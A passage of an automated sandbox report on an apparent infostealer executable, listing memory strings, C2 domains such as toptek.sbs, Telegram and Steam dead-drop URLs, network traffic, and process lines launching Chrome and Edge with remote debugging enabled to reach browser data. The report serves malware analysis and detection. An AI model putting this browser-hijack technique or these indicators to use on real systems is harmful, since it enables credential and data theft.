                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/0/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://srtb.msn.com/
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000083E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://t.me/k04ael
                  Source: gVKsiQIHqe.exeString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://tidal.com/
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000881000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbs
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/$G
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/(
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/.G
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/0
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/2G
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/4
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/D
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/H
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/L
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/LG
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/O
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/PG
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/PV
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/d8
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/rs
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2207333842.000000000090E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2221553316.000000000090C000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/w
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbs7QQIMGV
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsData
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsL
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsMGDJMOZ
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsMGDJMOZGIGIYTFFYT.pdfition:
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsQQ16FUSJ
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://toptek.sbsosh;
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://twitter.com/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://vibe.naver.com/today
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.telegram.org/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://web.whatsapp.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.deezer.com/
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, 4W4EKN.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: content_new.js.8.dr, content.js.8.drString found in binary or memory: https://www.google.com/chrome
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 2a74f5d3-95f0-423b-aeaa-f8df50f732fd.tmp.9.drString found in binary or memory: https://www.googleapis.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.iheart.com/podcast/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.instagram.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.last.fm/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.messenger.com
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.office.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.tiktok.com/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://www.youtube.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://y.music.163.com/m/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49762 version: TLS 1.2
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060

                  System Summary

                  Source: gVKsiQIHqe.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_004054A0 0_2_004054A0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_0041C450 0_2_0041C450
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_0041B0B0 0_2_0041B0B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_0041A340 0_2_0041A340
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_0041DD60 0_2_0041DD60
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_0041CF70 0_2_0041CF70
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_0041D3F0 0_2_0041D3F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: String function: 00410340 appears 127 times
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: String function: 00404DF0 appears 77 times
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: String function: 004119B0 appears 43 times
                  Source: gVKsiQIHqe.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@63/316@26/17
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Code function: 0_2_00412050 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,OpenProcess,TerminateProcess,CloseHandle,0_2_00412050
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KSK31933.htm
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\e58e90fe-b7c4-4330-af47-4a24cd416b8b.tmp
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: WLN79ZCTR.0.dr, P8Q1VAS26.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: gVKsiQIHqe.exe ReversingLabs: Detection: 71%
                  Source: gVKsiQIHqe.exe Virustotal: Detection: 66%
                  Source: unknown Process created: C:\Users\user\Desktop\gVKsiQIHqe.exe "C:\Users\user\Desktop\gVKsiQIHqe.exe"
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=2812,i,12872953387069903488,11110384550952122137,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2224,i,4927073609183200829,12100842426449448139,262144 /prefetch:3
                  Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:3
